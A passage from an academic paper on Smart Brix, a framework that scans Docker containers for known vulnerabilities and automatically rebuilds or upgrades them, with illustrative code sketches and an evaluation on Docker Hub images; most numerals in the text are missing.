analyzer facet. dpkg command to produce a package list. in the last step of this auto-assembly example the vulnerability analyzer listens for a package list and produces a list of vulnerabilities. this enables a straightforward auto-assembly approach, where connecting previous outputs to desired inputs leads to an automatically assembled complex system consisting of simple manageable processors. a processor itself can be anything and is not bound to any specific functionality, so it can be created completely flexibel depending on the task at hand. this approach further eliminates the necessity of complex composition and organization mechanisms, enabling dynamic and elastic compositions of desired functionality, where processors can be added on demand at runtime. this enables the previously mentioned creation of open and flexible analytics and compensation pipelines based on this principle. schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. 
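as an aside, the auto-assembly principle can be sketched in a few lines of code; this toy is illustrative only and is not the ruby implementation described later, and the processor names, message types and data are assumptions. each processor declares which message types it consumes and which single type it produces, and a driver keeps offering all available messages to every processor until nothing new is produced.

# toy sketch of self-assembling processors: each processor consumes a set of
# typed inputs and produces one typed output; the driver keeps offering all
# available messages until no processor produces anything new.
class Processor:
    def __init__(self, name, inputs, output, fn):
        self.name, self.inputs, self.output, self.fn = name, set(inputs), output, fn

    def try_run(self, messages):
        if self.inputs <= messages.keys() and self.output not in messages:
            return self.fn({k: messages[k] for k in self.inputs})
        return None

processors = [
    Processor("docker analyzer", {"artifact"}, "docker_image",
              lambda m: f"image({m['artifact']})"),
    Processor("package system analyzer", {"docker_image"}, "package_system",
              lambda m: "dpkg"),
    Processor("dpkg package analyzer", {"artifact", "package_system"}, "package_list",
              lambda m: ["apache2 2.4.10", "openssl 1.0.1k"]),
    Processor("vulnerability analyzer", {"package_list"}, "vulnerabilities",
              lambda m: [p for p in m["package_list"] if "openssl" in p]),
]

messages = {"artifact": "custom-httpd-container"}
progress = True
while progress:
    progress = False
    for p in processors:
        result = p.try_run(messages)
        if result is not None:
            messages[p.output] = result
            progress = True
print(messages["vulnerabilities"])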
/ https://peerj.com http://dx.doi.org/ . /peerj-cs. figure confidence adaptation model escalation. additionally, the components in the analyzer and compensation facets follow the principle of confidence elasticity, which means that a component or processor produces a result that is augmented with a confidence value (c ∈r, ≤c ≤ ), with representing no certainty and representing absolute certainty about the produced result. this allows for the specification of acceptable confidence intervals for the framework, which augment the auto-assembly mechanism. the confidence intervals are provided as optional configuration elements for the framework. in case the provided confidence thresholds are not met, the framework follows an escalation model to find the next component or processor that is able to provide results with higher confidence until it reaches the point where human interaction is necessary to produce a satisfactory result (illustrated in fig. ). each processor (pi) from the set of active processors (pa) provides a confidence value ci. we define the overall confidence value of all active processors (ca) as ca= ∏ pi∈pa ci. the compensation stops when ca meets the specified confidence interval of the framework or a processor represents a human interaction which has a confidence value of (ci= ). smart brix manager in order to initiate a container evolution, the smart brix manager is invoked via the smart brix api with the following parameters: (i) a set of containers to be inspected with (ii) the necessary credentials to analyze and evolve them, as well as an optional (iii) set of artifacts necessary to compensate or analyze the containers. in a first step the smart schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. brix manager queries the repository manager to see if there are already known issues for the supplied containers. if any known issues are found, the smart brix manager creates a corresponding compensation topic via the messaging infrastructure by publishing the container identifiers as well as the found issues. this represents an input that will subsequently be consumed by the corresponding compensation handlers and starts the previously described auto-assembly process in the compensation facet. if no issues were found, the smart brix manager hands off the supplied containers, credentials and artifacts to the dependency manager that is responsible for storing them in the dependency repository. as a next step, the smart brix manager creates a corresponding analyzer topic via the messaging infrastructure and publishes the container identifiers to it. this generates an input that will be consumed by the corresponding analyzers and starts another auto-assembly process in the analyzer facet. the smart brix manager then listens to the created topic and waits for a response from the analyzer facet. if any analyzer responds, the manager checks the confidence value of the provided results against the configured confidence interval of the framework. if the results satisfy the interval it uses the repository api to store them in the analytics repository. if the confidence intervals are not satisfied, it waits for a configured timeout for additional results to emerge. if this fails the framework escalates according to the principle of confidence elasticity and marks the containers as required for human interaction. 
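a small sketch of this confidence handling could look as follows; it is illustrative only, and the threshold, names and data are assumptions rather than the actual ruby implementation.

import math

# illustrative sketch of confidence elasticity: aggregate the confidence of
# all active processors as the product of their individual confidences and
# escalate to a human when the configured interval cannot be met.
def aggregate_confidence(confidences):
    return math.prod(confidences)          # c_a = product of all c_i

def decide(results, threshold=0.8):
    """results: list of (processor_name, confidence) pairs."""
    c_a = aggregate_confidence([c for _, c in results])
    if c_a >= threshold or any(c == 1.0 for _, c in results):
        return "accept", c_a               # interval met, or a human was involved
    return "escalate_to_human", c_a        # mark container for manual handling

print(decide([("docker analyzer", 0.9), ("vulnerability analyzer", 0.95)]))
print(decide([("similarity processor", 0.6), ("convention processor", 0.7)]))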
if the confidence interval was met, the smart brix manager initiates the previously mentioned auto-assembly process in the compensation facet. the smart brix manager then listens to the created topic and waits for a response from any compensation handler. in case of a response, it checks the confidence values by applying the same approach as for the analyzer facet, and stores them as compensations into the analytics repository. a corresponding sequence diagram illustrating this is shown in fig. . furthermore, the smart brix manager provides api endpoints to query the results of analytics and compensation processes, as well as the current status via container identifiers. repository manager the repository manager provides a repository for storing analytics results of all analyzed containers as well as their corresponding compensations. the analytics repository itself is a distributed key value store that enables analyzers as well as compensation handlers to store information without being bound to a fixed schema. in addition, this enables the previously mentioned open extensibility of our auto-assembly approach by allowing every component to choose the required storage format. finally, the repository manager provides a service interface to store and retrieve analytics and compensation information as well as an interface for querying information based on container identifiers or other attributes. dependency manager the dependency manager handles necessary credentials and artifacts that are needed for processing containers. the dependency manager provides a service interface that allows the smart brix manager to store artifacts and credentials associated with specific containers. additionally, it provides a mechanism for components in the analyzer and compensation schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure smart brix manager sequence diagram. facets to retrieve the necessary credentials and artifacts for the corresponding container ids. finally, it acts as service registry for components in the utility facet and exposes them to the compensation and analyzer facet. the dependency manager uses a distributed key value store for its dependency repository in order to store the necessary information. utility facet the general role of the utility facet is to provide supporting services for analyzers, compensation handlers, and managers of the framework. components in the utility facet register their offered services via the dependency manager. this provides an open and extensible approach that allows to incorporate novel elements in order to address changing requirements of container evolution. in our current architecture, the utility facet contains three components. first, a vulnerability hub, which represents a service interface that allows analyzers as well as compensation handlers to check artifacts for vulnerabilities. the vulnerability hub can either utilize public repositories (e.g., the national vulnerability database: https://nvd.nist.gov/), or any other open or proprietary schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://nvd.nist.gov/ http://dx.doi.org/ . /peerj-cs. vulnerability repository. the second component is a compliance hub that allows to check for any compliance violations in the same way the vulnerability hub does. this is an important element in heterogenous multi-stakeholder environments, where compliance to all specified criteria must be ensured at all times. 
the last element is a metric hub, which allows to check artifacts for certain relevant metrics in order to ensure relevant quality of service constraints for containers. analyzers the task of the components within the analyzer facet is to test containers for potential vulnerabilities, compliance violations or any other metrics. the facet is invoked by the smart brix manager, which triggers an auto-assembly process for the given containers that should be analyzed. the analyzer facet can contain components for the most prominent container formats like docker or rkt, but due to the fact that we utilize the auto-assembly approach, we are able to integrate new container formats as they emerge. for analyzing a container an analyzer follows three basic steps: (i) determine the base layer of the container in order to know how to access the package list; (ii) determine the list of installed packages including their current version; (iii) match the list of installed packages against a set of vulnerabilities, issues, or compliance constraints in order to determine the set of problems. every step can follow a different set of strategies to analyze a container represented as different processors, each of them with a specific confidence value. possible processors for these steps are: (i) base image processors, which try to determine the base layer of a container by matching their history against known base image ids; (ii) similarity processors that try to select a base layer based on similarities in the history of the container with known containers by performing actions like collaborative filtering and text mining; (iii) convention processors that try to determine the base layer by trying common commands and checking their results; (iv) human provided processors, which are human experts that manually analyze a container. in order to access the containers and to perform analytics, the components within the analyzer facet interact with the dependency manager. the manager provides them with the necessary credentials for processing containers. once the analyzers have processed a container, they publish the results, which are augmented with the confidence value, to the corresponding topic where the smart brix manager carries on as previously described. compensation handlers the components in the compensation facet generate potential compensations for containers that have been previously identified by the analyzers. like the analyzers, the compensation handlers are invoked by the smart brix manager, which starts an auto-assembly process for the containers with problems that should be compensated. we provide components for the most prominent container formats, with the ability to extend the list as new formats emerge. the compensation handlers follow three basic steps: (i) apply a compensation strategy for the container and the identified problem; (ii) verify if the compensation strategy could be applied by rebuilding or restarting the container; (iii) verify that the problems could be eliminated or reduced. schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. again, every step can utilize a set of different processors, each of them with a specific confidence value, which represent different strategies. possible processors are: (i) container processors, which try to use the base image’s package manager to upgrade packages with identified vulnerabilities. 
(ii) image processors that try to build a new image without the vulnerabilities; (iii) similarity processors that try to compensate via applying steps from similar containers that do not show these vulnerabilities; (iv) human provided processors, which are human experts that manually compensate a container. the compensation handlers interact with the dependency manager in a similar way as the analyzers to retrieve the necessary credentials to operate. as image processors and similarity processors build new images in order to compensate, they can request the necessary artifacts associated with an image to be able to build them. implementation we created a proof of concept prototype of our framework based on a set of restful microservices implemented in ruby. each component that exposes a service interface relies on the sinatra (http://www.sinatrarb.com/) web framework. the repository manager and the dependency manager utilize mongodb (https://www.mongodb.org/) as their storage backend, which enables the previously described distributed, open, and extendable key value store for their repositories. we implemented a vulnerability hub that uses a sqlite (https://www.sqlite.org/) storage backend to persist vulnerabilities in a structured format. it holds the recent data from the national vulnerability database (nvd; https://nvd.nist.gov/), specifically the listed common vulnerabilities and exposures (cves). this cve hub allows importing the cves posted on nvd, stores them in its repository, and allows searching for cves by vulnerable software name as well as version via its sinatra-based rest interface. to enable the auto-assembly mechanism for each processor within each component in the analyzer and compensation facets, we use a message-oriented middleware. specifically, we utilize rabbitmq's (https://www.rabbitmq.com/) topic and rpc concepts, by publishing each output and listening for its potential inputs on dedicated topics. we implemented a docker analyzer component with a base image processor and a convention processor-based strategy. the docker analyzer first tries to determine the operating system distribution of the container by analyzing its history. specifically, it uses the docker api to generate the history for the container and selects the first layer's id, which represents the base layer. it then matches this layer against a set of known layer ids, which map to corresponding operating system distributions, to determine which command to use for extracting the package list. if a match is found, it uses the corresponding commands to determine the package list. if the determined operating system is ubuntu or debian, it will use dpkg to determine the package list. if it was centos, yum is used, and if it was alpine, apk. after parsing the package command output into a processable list of packages, it checks each package name and version by using the cve hub via its rest interface. when this step is finished the analyzer publishes the list of possible vulnerabilities, including analyzed packages along with several runtime metrics. in case the base image strategy fails, the docker analyzer tries to determine the base layer, including the corresponding operating system, via a convention processor. specifically, it tests whether the image contains any of the known package managers.
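a minimal sketch of the base-image strategy described above is given below. it is an assumption-laden illustration, not the ruby prototype: it shells out to the docker cli instead of the docker api, the layer-id table and the cve hub endpoint url are placeholders, and rpm is used for centos only because its output is easier to parse than yum's (the paper names dpkg, yum and apk).

import json
import subprocess
import urllib.request

# illustrative mapping from known base layer ids to distributions (placeholder ids)
KNOWN_BASE_LAYERS = {"sha256:aaaa...": "ubuntu", "sha256:bbbb...": "centos"}

# package-listing commands per distribution flavor
PACKAGE_COMMANDS = {
    "ubuntu": ["dpkg-query", "-W", "-f", "${Package} ${Version}\n"],
    "debian": ["dpkg-query", "-W", "-f", "${Package} ${Version}\n"],
    "centos": ["rpm", "-qa", "--qf", "%{NAME} %{VERSION}\n"],
    "alpine": ["apk", "info", "-v"],
}

CVE_HUB_URL = "http://cve-hub.local/search"  # assumed cve hub rest endpoint

def base_layer_flavor(image: str) -> str:
    # determine the distribution by matching the oldest (base) layer id
    out = subprocess.check_output(
        ["docker", "history", "--no-trunc", "--format", "{{.ID}}", image],
        text=True)
    base_id = out.strip().splitlines()[-1]
    return KNOWN_BASE_LAYERS.get(base_id, "unknown")

def installed_packages(image: str, flavor: str):
    # run the flavor-specific package listing inside the container image
    cmd = ["docker", "run", "--rm", image] + PACKAGE_COMMANDS[flavor]
    out = subprocess.check_output(cmd, text=True)
    return [line.split() for line in out.splitlines() if line.strip()]

def vulnerabilities(packages):
    # look up each (name, version) pair in the cve hub via its rest interface
    found = []
    for name, version in packages:
        url = f"{CVE_HUB_URL}?package={name}&version={version}"
        with urllib.request.urlopen(url) as resp:
            found.extend(json.load(resp))
    return found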
based on the results of this check, the analyzer determines the distribution flavor and continues as described above. we further implemented a docker compensation handler with a container processor and an image processor based compensation strategy. the container processor tries to upgrade the container using the operating system distribution's package manager. after this operation succeeds, it checks if the number of vulnerabilities is reduced, by comparing the new versions of packages against the cve hub. if this was the case it augments the results with a confidence value based on the percentage of fixed vulnerabilities and publishes the results. the image processor tries to fix the container by generating a new container manifest (e.g., dockerfile). more precisely, it uses the docker api to generate the image history and then derives a dockerfile from this history. after this step, the image processor exchanges the first layer of the dockerfile with the newest version of its base image. in cases where it cannot uniquely identify the correct linux flavor, it generates multiple dockerfiles, for example one for ubuntu and one for debian. it then checks the dockerfiles' structure for potential external artifacts. specifically, it searches for any copy or add commands that are present in the dockerfile. if this is the case, it contacts the dependency manager and attempts to retrieve the missing artifacts. once this is finished the image processor tries to rebuild the image based on the generated dockerfile. after this step is finished, the image processor again checks the new list of packages against the cve hub, and if it could improve the state of the image it publishes the results with the corresponding confidence value. the prototype implementation is available online and can be found at https://bitbucket.org/jomis/smartbrix/. deployment modes the smart brix framework provides a container for each facet and therefore supports deployment on heterogeneous infrastructures. the framework enables wiring of components and aspects via setting the container's environment variables, enabling dynamic setups. we distinguish between two fundamental deployment modes, inspection mode and introspection mode. inspection mode the inspection mode allows the framework to run in a dedicated inspection and compensation setting. in this mode the framework ideally runs exclusively, without any other containers, and utilizes the full potential of the host systems. this means that the smart brix managers wait until they receive an explicit request to analyze and compensate an artifact. introspection mode the introspection mode allows the framework to run in an active container setup. in this mode the framework constantly watches deployed containers via the smart brix manager. the manager can be provided with a list of containers to watch via a configuration setting. this provided list of containers is then analyzed and compensated. if no container lists are supplied, the manager watches all running containers on the platform. in this case it initiates a check whenever new images are added, an image of a running container changes, or new vulnerabilities are listed in the cve hub.
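the environment-variable wiring of the two deployment modes could look roughly as follows. the variable names, default values and event types are hypothetical, chosen only to make the configuration mechanism concrete; the actual prototype may use different names.

import os

# hypothetical environment variables; names are illustrative only
MODE = os.environ.get("SMARTBRIX_MODE", "inspection")  # or "introspection"
MESSAGING_URL = os.environ.get("SMARTBRIX_MESSAGING_URL", "amqp://rabbitmq:5672")
REPOSITORY_URL = os.environ.get("SMARTBRIX_REPOSITORY_URL", "mongodb://repo:27017")
# comma-separated list of containers to watch; empty means "watch everything"
WATCHED = [c for c in os.environ.get("SMARTBRIX_WATCHED_CONTAINERS", "").split(",") if c]

def should_analyze(event_type: str, container_id: str) -> bool:
    # inspection mode only acts on explicit api requests,
    # introspection mode reacts to platform and cve hub events
    if MODE == "inspection":
        return event_type == "api_request"
    if WATCHED and container_id not in WATCHED:
        return False
    return event_type in {"image_added", "image_changed", "new_cve_listed"}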
evaluation setup for our evaluation we used the following setup. we provisioned three instances in our private openstack cloud, each with . gb of ram and virtual cpus. each of these instances was running ubuntu . lts with docker staged via docker-machine (https://docs.docker.com/machine/install-machine/). for our evaluation we chose the inspection deployment variant of our framework in order to stress-test the system without other interfering containers. we deployed one manager container representing the management facet, as well as two utility containers containing the cve hub and the messaging infrastructure, on one instance. we then distributed analyzer containers with compensation containers over the remaining two instances. additionally, we deployed a cadvisor (https://github.com/google/cadvisor) container on every instance to monitor the resource usage and performance characteristics of the running containers. figure shows an overview of the deployed evaluation setup.
figure: evaluation setup of smart brix running in inspection mode.
experiments since we currently only have around images in our urbem setting, we extended the number of images to be evaluated. in order to get a representative set of heterogeneous images we implemented a small service to crawl docker hub (https://hub.docker.com/). the docker hub is a public repository of docker container images of different flavors. these images range from base images, like ubuntu and centos etc., to more complex images like cassandra and apache spark. we utilized the search function of the hub to collect a set of , images ordered by their popularity (number of pulls and number of stars), which ensures that we focus on a set with a certain impact. we then extracted the name and the corresponding pull commands along with the latest tag to form the uri of the image. this set of , uris represented the source for our experiments, which was then split into sets containing , , and , images to be tested. analyzer experiments we started our experiments with a focus on the analyzer facet of the framework. first, we started the analyzer containers on one instance and started our tests with the image set. after the run finished we repeated it with the and , image sets. after the tests with one instance, we repeated the experiments with two instances, where each run was repeated three times. during the tests we constantly monitored cadvisor to ensure that the instances were not fully utilized, so that this would not skew results. the focus of our experiments was not the performance characteristics of our framework in terms of cpu, memory or disk usage, which is why we used cadvisor only as a monitor to rule out overloading our infrastructure. we also did not utilize any storage backend for cadvisor, since this has been shown to add significant overhead, which in turn would have skewed our results. after the runs had finished we evaluated the vulnerability results. the analyzers logged the analyzed images, their base image flavor (e.g., ubuntu, debian etc.), processing time to analyze the image, pull time to get the image from the docker hub as well as the overall runtime, number of packages, size of the image, and number of vulnerabilities.
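the per-image record logged by the analyzers, as listed above, could be represented roughly as follows; the field names and types are our own reading of that list, not the prototype's actual schema.

from dataclasses import dataclass, field
from typing import List

@dataclass
class AnalyzerResult:
    # one log entry per analyzed image (fields mirror the list above)
    image: str                      # analyzed image uri
    base_flavor: str                # e.g. "ubuntu", "debian"
    pull_time_s: float              # time to pull the image from docker hub
    processing_time_s: float        # time to analyze the image
    overall_runtime_s: float        # pull plus processing
    package_count: int
    image_size_mb: float
    vulnerabilities: List[str] = field(default_factory=list)  # cve identifiers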
over all our experiments the analyzers showed that around % of the analyzed images have vulnerabilities. this mainly stems from the fact that our implemented analyzers have a very high sensitivity and check for any potentially vulnerable software with any potentially vulnerable configuration. however, this does not necessarily mean that the specific combination of software and configuration in place shows the detected vulnerability. if we only take a look at the images with a high severity according to their cvss (https://nvd.nist.gov/cvss.cfm) score, around % are shown to be affected, which is consistent with recent findings (http://www.banyanops.com/blog/analyzing-docker-hub/). these results underline the importance of implementing the measures proposed by our framework. however, the focus of our work and the aim of our experiments was not to demonstrate the accuracy of the implemented vulnerability detection, but the overall characteristics of our framework, which we discuss in the remainder of this section. we first compared the overall runtime of our analyzers, specifically the difference between one-instance and two-instance deployments; the results are shown in fig. .
figure: comparison of runtime for analytics between one instance and two instances.
based on the results we see that our approach can be horizontally scaled over two nodes, leading to a performance improvement of around %. the fact that in our current evaluation setting we were not able to halve the overall runtime using two instances stems from several factors. on the one hand, we have a certain overhead in terms of management and coordination, including the fact that we only deployed one manager and storage asset. on the other hand, a lot of the runtime is caused by the acquisition time, which is clearly bound by network and bandwidth. since our infrastructure is equipped with just one mbit uplink that is shared by all cloud resources, this is a clear bottleneck. we also see that the majority of wall clock time is spent on acquisition and that the actual processing time only amounts to approximately % of the overall runtime. the fact that the acquisition time for the , image set does not grow linearly, unlike the runs with the and image sets, stems from docker's image layer cache. in this case the overall acquisition time grows slower, because a lot of images in the , set share several layers, which, if already pulled by another analyzer in a previous run, do not need to be pulled again, hence reducing the acquisition time. finally, we demonstrate that the average processing time of our framework is stable, which is shown in fig. .
figure: comparison of processing time for analytics with two instances.
we further notice a small increase in average processing time for the image set, which is caused by the fact that this set contains more images with larger package numbers compared to the overall amount of images tested, resulting in a slightly higher average processing time. as illustrated in table , per-package processing times remain stable throughout the performed experiments, with a median of . s and a standard deviation of . s.
table: median and standard deviation for processing time per package over all runs with two instances, per image set and overall.
compensation experiments in the next part of our experiments we focused on the compensation facet of our framework.
in order to test the ability to automatically handle compensations of vulnerable images, we tested the implemented container processor strategy. this strategy compensates found vulnerabilities via automatic upgrades of existing images. it takes no human intervention, has a very high confidence, keeps all artifacts within the images and is therefore optimal for testing the auto-compensation ability of our framework. in the process of compensation the container processor generates a new image with the upgraded packages. in order to test this image for improvement we have to store it. this means that for every tested image we have to hold the original image as well as its compensated version. specifically, we chose to test the most vulnerable images (images with the most vulnerable packages) out of the , image set we tested that are also the most prominent images in our urbem scenario. this left us with images, which we split into three sets with , , and images, and started our compensation tests. we then repeated each run to demonstrate repeatability and to balance our results. since the compensation facet follows the same principle as the analyzer facet, we omitted testing it on one instance and immediately started with two instances. after the tests finished, we compared the newly created images to the original ones and checked if the number of vulnerabilities could be reduced. overall our experiments showed that from the images we were able to auto-compensate images by reducing the number of vulnerabilities. this illustrates that even a rather simple strategy leads to a significant improvement of around . %, which makes this a very promising approach. in a next step, we compared the overall runtime of our compensation handlers for the three tested sets, and the results are shown in fig. .
figure: comparison of pull time and processing time for compensation with two instances.
we again can clearly see that the major amount of time is spent on acquisition, in this case pulling the images that need to be compensated. the compensation itself only takes between % and % of the overall runtime and shows linear characteristics correlating with the number of images to be compensated. the comparatively low increase in acquisition time for the image set can again be explained by the specific characteristics we see in docker's layer handling. in a next step, we compared the average processing time for each set, and the results are shown in fig. .
figure: comparison of processing time for compensation with two instances.
we again notice similar characteristics as we saw with our analyzers. the average processing time as well as the median processing time are stable. the small increase for the image set is explained by a larger number of images that contain more packages. this fact leads to relatively longer compensation times when upgrading them. discussion our experiments showed that our framework is able to scale horizontally. we further demonstrated that the majority of the runtime, both when analyzing and compensating images, is caused by the image acquisition, which is bandwidth bound. given the fact that in most application scenarios of our framework the images will not necessarily reside on
docker hub, but instead in a local registry, this factor becomes much less significant. the processing time itself scales linearly with the number of analyzed packages, and the same was shown for the compensation approach. furthermore, the processing time in our current evaluation setup is mostly constrained by the prototypical vulnerability checking mechanism and the chosen storage system, neither of which is the focus of our contribution. the implementation of different vulnerability checkers, along with more efficient storage and caching of vulnerability data, could lead to further reductions in processing time and will be tackled in future work. an additional aspect we did not specifically address in this paper is the fine-grained scale-out of components in all smart brix facets. threats to applicability while the presented framework fulfills the requirements set forth in the previously introduced urbem project, certain threats to the general applicability of smart brix remain. currently, the auto-assembly mechanism introduced in 'framework rationales' attempts to eagerly construct analysis and compensation pipelines that are loosely structured along the level of specificity of the performed analysis. hence, the number of created pipelines can grow exponentially with the number of candidate components in the worst case. if all components for a given level of specificity accept all inputs produced in the previous level, and all subsequent components accept all produced outputs in turn, the number of created pipelines would grow exponentially with the number of components per level of specificity. this problem can be mitigated by introducing a transparent consolidation mechanism that delays the propagation of produced outputs of a certain type for a specified amount of time, orders them by the reported confidence values, and only submits one (or a few) of the produced output values with the highest confidence values for further consumption by other components. due to the relatively small number of processing components required for the urbem use case, we left the implementation of this consolidation mechanism for future work.
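the consolidation mechanism outlined above could be approximated as follows: outputs of a given type are buffered for a configurable delay, ordered by their reported confidence values, and only the top few are forwarded downstream. this is a sketch of the idea under our own assumptions about the publishing interface; it is not part of the released prototype.

import heapq
import threading

class ConsolidatingPublisher:
    # buffers produced outputs per output type, then forwards only the
    # few with the highest confidence values, limiting pipeline fan-out
    def __init__(self, publish, delay_seconds=5.0, top_k=1):
        self._publish = publish          # callable forwarding an output downstream
        self._delay = delay_seconds
        self._top_k = top_k
        self._buffers = {}               # output type -> list of (confidence, output)
        self._lock = threading.Lock()

    def submit(self, output_type, output, confidence):
        with self._lock:
            buffered = self._buffers.setdefault(output_type, [])
            first = not buffered
            buffered.append((confidence, output))
        if first:
            # schedule a single flush for this output type after the delay
            threading.Timer(self._delay, self._flush, args=(output_type,)).start()

    def _flush(self, output_type):
        with self._lock:
            buffered = self._buffers.pop(output_type, [])
        # forward only the top-k buffered outputs by reported confidence
        for confidence, output in heapq.nlargest(self._top_k, buffered,
                                                 key=lambda item: item[0]):
            self._publish(output_type, output, confidence)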
related work the rapid adoption of container-based execution environments for modern applications enables increased flexibility and fast-paced evolution. next to this fast-paced evolution of containers, new containers are deployed whenever functionality has to be added, which leads to massive amounts of containers that need to be maintained. while the container provides an abstraction on top of the operating system, it is still vital that the underlying system complies with policies and regulations to avoid vulnerabilities. however, checking the plethora of available environments and adapting them accordingly is not a trivial task. among several approaches stemming from the area of soa, such as the works of lowis & accorsi ( ) and yu, aravind & supthaweesuk ( ), which deal with classic service vulnerabilities, as well as the work of li et al. ( ), lowis & accorsi ( ) propose a novel method for analyzing cloud-based services for certain types of vulnerabilities. next to general models and methods for classifying and analyzing applications, several approaches emerged that allow vulnerability testing. they range from service-oriented approaches for penetration and automated black-box testing introduced by bau et al. ( ) and li et al. ( ) to model-based vulnerability testing like the work of lebeau et al. ( ) as well as automated vulnerability and infrastructure testing methods (e.g. shahriar & zulkernine, ; hummer et al., ). antunes & vieira ( ) introduce soa-scanner, an extensible tool for testing service-based environments for vulnerabilities. based on an iterative approach, the tool discovers and monitors existing resources, and automatically applies specific testing approaches. also, more recently, large-scale distributed vulnerability testing approaches have been introduced (e.g. evans, benameur & elder, ; zhang et al., ). in contrast to our approach, the aforementioned tools solely concentrate on testing and identifying possible security threats, but do not provide means for adapting the observed application or its environment accordingly. more recently, container-based approaches have been applied in the literature to ease the development and operation of applications. tosatto, ruiu & attanasio ( ) analyze different cloud orchestration approaches based on containers and discuss ongoing research efforts as well as existing solutions. furthermore, the authors present a broad variety of challenges and issues that emerge in this context. wettinger, breitenbücher & leymann ( ) present an approach that facilitates container virtualization in order to provide an alternative deployment automation mechanism to convergent approaches that are based on idempotent scripts. by applying action-level compensations, implemented as fine-grained snapshots in the form of containers, the authors showed that this approach is more efficient, more robust, and easier to implement than convergent approaches. however, compared to our approach, the authors do not provide a framework for analyzing container application deployments that, based on identified issues, triggers corresponding compensation mechanisms. gerlach et al. ( ) introduce skyport, a container-based execution environment for multi-cloud scientific workflows. by employing docker containers, skyport is able to address software deployment challenges and deficiencies in resource utilization, which are inherent to existing platforms for executing scientific workflows. in order to show the feasibility of their approach, the authors add skyport as an extension to an existing platform, and were able to reduce the complexities that arise when providing a suitable execution environment for scientific workflows. in contrast to our approach the authors solely focus on introducing a flexible execution environment, but do not provide a mechanism for continuously evolving container-based deployments. li, kanso & gherbi ( ) present an approach that leverages linux containers for achieving high availability of cloud applications. the authors present a middleware that is comprised of agents to enable high availability of linux containers. in addition, application components are encapsulated inside containers, which makes the deployment of components transparent to the application. this allows monitoring and adapting components deployed in containers without modifying the application itself. although this work shares similarities with our approach, the authors do not provide a framework for testing container-based deployments, which also supports semi-automatic compensation of found issues.
next to scientific approaches, also several industrial platforms emerged that deal with the development and management of container-based applications, with the most prominent being tutum (https://www.tutum.co) and tectonic (https://tectonic.com). these cloud-based platforms allow building, deploying and managing dockerized schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.tutum.co https://tectonic.com http://dx.doi.org/ . /peerj-cs. applications. they are specifically built to make it easy for users to develop and operate the full spectrum of applications, reaching from single container apps, up to distributed microservices stacks. furthermore, these platforms allow keeping applications secure and up to date, by providing easy patching mechanisms and holistic systems views. in contrast to our approach, these platforms only focus on one specific container technology, and are not extensible. ibm recently introduced the ibm vulnerability advisor (https: //developer.ibm.com/bluemix/ / / /vulnerability-advisor/), a tool for discovering possible vulnerabilities and compliance policy problems in ibm containers. while ibm’s approach shares similarities with our work, they are solely focusing on docker containers that are hosted inside their own bluemix environment and therefore do not provide a generic approach. furthermore, their vulnerability advisor only provides guidance on how to improve the security of images, but does not support mechanisms to evolve containers. conclusion the numerous benefits of container-based solutions have led to a rapid adoption of this paradigm in recent years. the ability to package application components into self- contained artifacts has brought substantial flexibility to developers and operation teams alike. however, to enable this flexibility, practitioners need to respect numerous dynamic security and compliance constraints, as well as manage the rapidly growing number of container images. in order to stay on top of this complexity it is essential to provide means to evolve these containers accordingly. in this paper we presented smart brix, a framework enabling continuous evolution of container application deployments. we described the urbem scenario as a case study in the smart city context and provided a comprehensive description of its requirements in terms of container evolution. we introduced smart brix to address these requirements, described its architecture, and the proof of concept implementation. smart brix supports both, traditional continuous integration processes such as integration tests, as well as custom, business-relevant processes, e.g., to implement security, compliance, or other regulatory checks. furthermore, smart brix not only enables the initial management of application container deployments, but is also designed to continuously monitor the complete application deployment topology and allows for timely reaction to changes (e.g., discovered application vulnerabilities). this is achieved using analytics and compensation pipelines that will autonomously detect and mitigate problems if possible, but are also designed with an escalation mechanism that will eventually request human intervention if automated implementation of a change is not possible. we evaluated our framework using a representative case study that clearly showed that the framework is feasible and that we could provide an effective and efficient approach for container evolution. 
as part of our ongoing and future work, we will extend the presented framework to incorporate more sophisticated checking and compensation mechanisms. we will integrate mechanisms from machine learning, specifically focusing on unsupervised learning techniques as a potential vector to advance the framework with autonomous capabilities. we also aim to integrate the smart brix framework with our work on iot cloud applications (inzinger et al., ; vögler et al., b; vögler et al., a). furthermore, we schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://developer.ibm.com/bluemix/ / / /vulnerability-advisor/ https://developer.ibm.com/bluemix/ / / /vulnerability-advisor/ http://dx.doi.org/ . /peerj-cs. plan to conduct a large-scale feasibility study of our framework in heterogenous container application deployments. additional information and declarations funding the research leading to these results has received funding from the urbem doctoral college. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: urbem. competing interests schahram dustdar is an academic editor for peerj. author contributions • johannes m. schleicher conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • michael vögler and christian inzinger conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • schahram dustdar wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: ( ) source code repository for the prototype implementation: https://bitbucket.org/ jomis/smartbrix/ ( ) the evaluation results: https://bitbucket.org/jomis/smartbrix/downloads/smartbrix_ evaluation_results.zip. references antunes n, vieira m. . soa-scanner: an integrated tool to detect vulnerabilities in service-based infrastructures. in: proceedings of the international conference on services computing. piscataway: ieee, – . bau j, bursztein e, gupta d, mitchell j. . state of the art: automated black-box web application vulnerability testing. in: proceedings of the symposium on security and privacy. piscataway: ieee, – . evans ns, benameur a, elder m. . large-scale evaluation of a vulnerability analysis framework. in: th workshop on cyber security experimentation and test (cset ). available at http://nsl.cs.columbia.edu/projects/minestrone/papers/cset -paper- evans.pdf . schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://bitbucket.org/jomis/smartbrix/ https://bitbucket.org/jomis/smartbrix/ https://bitbucket.org/jomis/smartbrix/downloads/smartbrix_evaluation_results.zip 